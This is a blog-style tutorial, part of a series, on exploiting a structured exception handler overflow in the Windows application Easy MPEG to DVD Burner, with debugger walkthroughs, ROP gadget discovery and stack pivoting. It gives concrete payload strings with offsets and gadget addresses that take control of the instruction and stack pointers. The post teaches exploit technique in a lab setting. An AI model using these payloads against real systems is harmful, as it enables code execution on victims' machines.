Windows Exploit Development : Exploiting Structured Exception Handling and ROP Chaining

Hi folks this post is a continuation of a series I'm doing covering the fundamentals of windows exploit development. In this post I'm going to inch a little closer to arbitrary code execution by showing you how to chain ROP gadgets and one or two stack pivoting tricks.

So here's how this post is going to go:

We we're gonna look at how Structured Exception handling works
We're gonna break it and show how it breaks
Then we're going to make it execute whatever code we want
Figure out how to fix our stack pointer
Chain some ROP gadgets

What you need

Windows Virtual Machine
Debugger Tools for windows
Easy MPEG to DVD Burner (copy available on exploit-db)
ImmunityDBG
(optional) python script memcoder.py https://gist.github.com/k3170makan/7f55d25869f3f812f8c3706089c0a74c

Reverse Engineering Structured Exception Handling

Structured Exception handling is a mechanism offered to functions in that allow them to customize their responses to hardware and software exceptions. Hardware exceptions are events that are triggered from outside of the processes control or as described in the MS documentation "by the CPU". So you can imagine this would mean events or errors that involve possible mis use of registers and memory and perhaps maths operations on these values and the memory areas they refer to. Software exceptions are those that are defined by the processes themselves these are exceptions triggered by things like wrong parameters or operations on objects or custom data structures[1].

Exception handlers are merely places in memory that contain code, and are triggered when a given exception is generated. The system finds the correct handler by walking a linked list of handlers stored in stack memory.

Here's what this linked list looks like:

[7] - picture stolen from https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

Struct definition for the linked list members in an SEH chain, as defined in https://www.nirsoft.net/kernel_struct/vista/EXCEPTION_REGISTRATION_RECORD.html

So each item in this linked list has two items in it basically. You can think of our input to the program (our payload of characters in the username registration value) as instructions for whatever code handles this linked list - this is because whatever value we use to overwrite the Next PEXCEPTION_REGISTRATION_RECORD will basically "steer" or control the direction in memory the code will take that handles the structure. Further more the other interesting value we can influence here is a PEXCEPTION_DISPOISTION Handler - this value is essentially treated as a pointer to a function that will be executed as the "current" exception handler.

So just to sum this up: the first position in the EXCEPTION_REGISTRATION_RECORD is the location of the next handler in the chain, so its an address in stack memory. The position after that is the address of some code to run that handles the exception and end of the list is marked with a 0xffffffff.

The beginning of the chain of handlers is stored in the Thread Environment Block, this is just a dramatic name for a list of pointers in memory that hold certain environment attributes for the thread, amongst the many things defined there the beginning of the Structured Exception Handler list is stored there in the 1st position on Windows 9x and NT systems[6].

https://en.wikipedia.org/wiki/Win32_Thread_Information_Block

Lets check out what this looks like for Easy MPEG to DVD Burner in WinDBG. You may need to break the process in first (Debug -> Break), if you do make sure you change threads with the ~[thread number]s before checking out the TEB information because each thread has its own TEB!.

The !teb command above displays some nicely formatted information about our TEB, you can also use the fs segment register (also referred to as the Extra Data register as in an annex to the ds register[10])to dump each value in the TEB as follows - since its just reading them from the same place as the segment register anyway. Here's a quick look to confirm that the values are actually the same:

Keep in mind that when an exception is generated the system will walk down the list and execute each handler until it reaches the end or dies along the way.

Quick memcoder script tutorial

Before I start injecting values here I must apologize for the horrible helper script I suggested in the previous post by suggesting another potentially bad one only this one is must simpler in design and I think its actually useful and pretty simple to extend and understand. The script going to use is called memcoder.py its a simplistic byte string writer tool for exploit development. I've hosted it here if you want to grab a copy. memcoder is pretty simple to use it excepts a simple grammar and a list of an arbitrary number of parameters, all you do is give it a list of values to write out to the screen as a payload. The parameters that will be written out as a payload are of this format :

[byte pattern]"-"[number]

Where [byte-pattern] is a list of hexadecimal number in a list of the format [digit digit]"_"
and [number] is just the amount of that byte pattern you would like to write out. The idea is you give it a list of these values and it returns it as a payload. As an example lets say I want to have a list of "A"s as payload. This means I would give memcoder.py these parameters:

memcoder.py 41_41_41_41-10

Which means write out 4 0x41 values 10 times - so 40 "A"s in total, which is the hexadecimal base of the ascii value of the letter "A" as we already know. Here's some more examples:

And thats it! Lets get back to corrupting and controlling the SEH handler.

Exploiting Structured Exception Handling

Now lets look at what happens when you corrupt the handler, after giving it 1000 characters (preferably "A"s) as input the process will cause an exception and you will be able to check out some stuff in WinDBG. Using memcoder you should give it 4-byte wide patterns to copy; it just makes reading memory values and comparing them in your head much much easier in my opinion. Also single chars will be printed with spaces between them because of how memcoder is scripted. Here's the command I used to generate my test payload of 1000 chars:

memcoder.py 41_41_41_41-250

Because 250 = 1000 / 4. So after we give it the paylaod, after it breaks in; lets check out what happens if we traverse the SEH chain ourselves:

Walking the SEH chain manually then. We can dump the start of the chain with the dc fs:[0] command and unpack it from there:

Here's what you see when you follow the chain all the way down:

As can be seen in the screenshot below we overflowed the value for both the "Next" position in the chain and the immediate exception handler at the current position. What happens effectively is the system tries to run code at 0x41414141 and it find that this memory address doesn't exist so it cant run anything there and crashes! But it doesn't have to, we can give it an address to run!

But before we need to do that we need to figure out how much to write in order to safely overwrite the SEH handler pointers. As we can see, from the screenshot 250 4 byte values means that we hit the SEH handler at 0x0019a1c0 and then some, by 3 characters. So what we do to make sure we can control those regions in memory precisely is add some values at the end, lets write one less 0x41414141 and make the Next SEH value 0x42424242 and the Current handler address 0x43434343. So that means we want this set up for memcoder:

41_41_41_41-247 42_42_42_42-1 43_43_43_43-1

Which results in this when its injected:

Yaay we at least know where our payload is ending up in memory. Of course we're going to need to find an address value that we can pass to the program as an ascii string, so anything that delimits a string as a character is out of question as a payload value. I find it more fun to find out what these values are along the way but of course you can imagine they are things like:

0xa \n - a line feed
0xd \r - a return carriage
0x0 null byte - a string terminator

And perhaps one or two other depending on how the payload will make its way in to the username field in practice. Some articles i reference below have a clever way of working out what will be a bad character to use as a memory address but I think you're better off trying one after the other until you find one that works - its pretty straight forward usually determining which character won't join the party in memory. But if you need some concrete view of your search space I fully recommend checking them out.

Remembering something from the previous post we found out that ASLR can change where certain modules end up in memory. We can find out what these modules are by checking out where they are loaded in memory, choosing an instruction from any modules that are loaded to the same address and then testing if they are always loaded at the same place. Alternatively you could whip out Immunity DBG and Mona.py and use the rop command I've linked some tutorials about this and at the end of the post. But in case you needed a quick crash course, all you need to do is:

Install Immunity Debugger (super eays to do)
Download Mona.py link provided here
Open the target app in Immunity Debugger (File->Open : search for Easy MPEG to DVD Converter)
In the command bar at the bottom type !mona rop
Find and open the rop.txt file

Once you get that down you should see the following, a list of addresses for potential rop gadgets. We are going to start injecting them straight from the get here! As a simple example here just to make sure we can actually inject correctly, lets take the address 0x1003750b and build a payload using memcoder like this:

python.exe memcoder.py 41_41_41_41-247 42_42_42_42-1 10_03_75_0b-1

And here's me injecting the finished payload with our next fake exception handler on the end of it:

Now when it breaks in because of the exception being generated, we can make sure that the code we targeted actually runs by setting a break point and seeing if the thread actually runs that code! In the screenshot above you can see me set a break point for the address we injected. Check out what happens when I let it run and handle the exception:

Viola! I just crafted some code execution by overwriting a structured exception handler! Now lets chain some rop gadgets!

Pivoting the Stack Pointer and Chaining ROP Gadgets

Okay so we can execute code, our input is now literally controlling execution. What we need to do now is be able to inject more than one instruction.

Before we go on we should talk about what ROP (Return Orientated Programming) Gadgets are. A while back folks put together the idea that one can by pass the reliance off directly injecting code into memory during exploitation (since it was no longer possible due to Data Execution Prevention - a measure disabling execution in certain memory ranges). They figured out that if you inject an instruction that performs some simple operations and then returns immediately after its possible to combined them to load registers with certain values, inject certain values onto the stack and eventually effect calls to certain enabling functions in the modules available to Windows processes. Theses functions allow the injected payload to be executed as code.

Back to the predicament we find our exploit in. Why can't we inject more than one? Well when the function is done executing that one little rop gadget it will need to return control whatever function called it - for this particular piece of code that function is us! So what will happen here is the function will try to return as though everything else is hunky dory and then it will crash because the stack pointer (which is basically the value that eip will assume when the function returns) - probably doesn't point to executable code anything that looks enough enough like code.

To get a grip on how the ret (return) instruction works lets change the esp value just before the its executed and see where it tries to continue executing afterwards:

What we can see from the above screenshot is that the esp value clearly has something to do with the value eip assumes after the ret instruction is executed. Of course it must then be important what the esp value is after executing the first instruction we inject as the "fake" SEH handler.

The process of updating the esp value so that it allows us to chain instructions and reliably control where ret instructions will land us up is called "stack pivoting" or "stack lifting" sometimes. What we need to effect is a way to change the esp value so that it goes from pointing to somewhere into memory where we cannot influence it with our input to somewhere we can. So we need to execute some instruction that either adds to, replaces, subtracts or does something that nudges the esp in the right direction. One such instruction is this one at 0x00404e11:

Now we need a way to inject this address into memory as an ascii string. But there's a problem here of course it contains a null byte at the beginning! But not to fret its not odd for null bytes to sometimes naturally grow around your payload in memory sometimes, it also often turns out if you need a null byte at the end of the payload, it ends up there because printable string input is often null delimited when written into memory - sometimes not, and funny enough this can cause a memory corruption issue!

Here's a payload you could try with memcoder,

41_41_41_41-248 40_4e_11-1

Notice we are not writing a full 4 bytes as the last argument, check out what happens as a result:

Okay so it looks like this instruction adds 0x778 to the value of the stack pointer and then returns. Here's some hard evidence the stack pointer actually does update and points to an area with a suspicious amount of 0x41 bytes all over the place hmmm:

We now have control of the eip and the esp! We just need to find out how far into our payload the esp ends up pointing at. After we know that we will be able to place another pointer to the next ROP gadget in the chain, at this point we can then literally chain gadgets together and get stuff done to be able to execute our payload.

So how far into our input string does it return to? How are we going to figure this out? Well we guess, same way we figured out which part of our input was replacing the SEH value. We can poke around in memory by splitting our payload up into sections. We can add another pair of characters 0x42 and 0x43. 0x42 is going to be what lies before the first esp value and 0x43 will make up the esp value its self. Here's what a guess memcoder payload looks like:

42_42_42_42-10 43_43_43_43-10 41_41_41_41-228 40_4e_11-1

Here's the result:

This clearly means in guessing 10 4 byte values we guessed 1 too many, and we can try using 9 instead having the following 4 byte value assume the pointer to the new rop gadget. Here's the updated payload:

42_42_42_42-9 43_43_43_43-1 41_41_41_41-238 40_4e_11-1

and the result:

More good news! We finally pivoted the stack and we can start chaining ROP gadgets! Grab that rop.txt and start trying some gadgets! Here's an example chain payload:

42_42_42_42-9 10_03_3e_3c-1 22_22_22_22-1 41_41_41_41-237 40_4e_11-1

The instruction we injected pop's a value into eax, this means it will take the first value next to the initial instruction pointer on the stack and move it into eax. It can be noted that eax actually does contain this value as indicated by the r command in the screenshot. Another example chain could be for example chaining that instruction and changing the value of eax every-time for instance:

And here again it looks like eax is playing along with our tactics!

There are more registers to play with make sure you're good at getting whatever value into whatever register you like. Beyond this its very rewarding to practice figuring out what the limitations in getting certain values into certain registers are, for instance what if an instruction you need just doesn't exist? How to get around them etc etc. In the next post we will talk about how to inject arbitrary instructions straight into the process to get full code execution going.

k3170

Search This Blog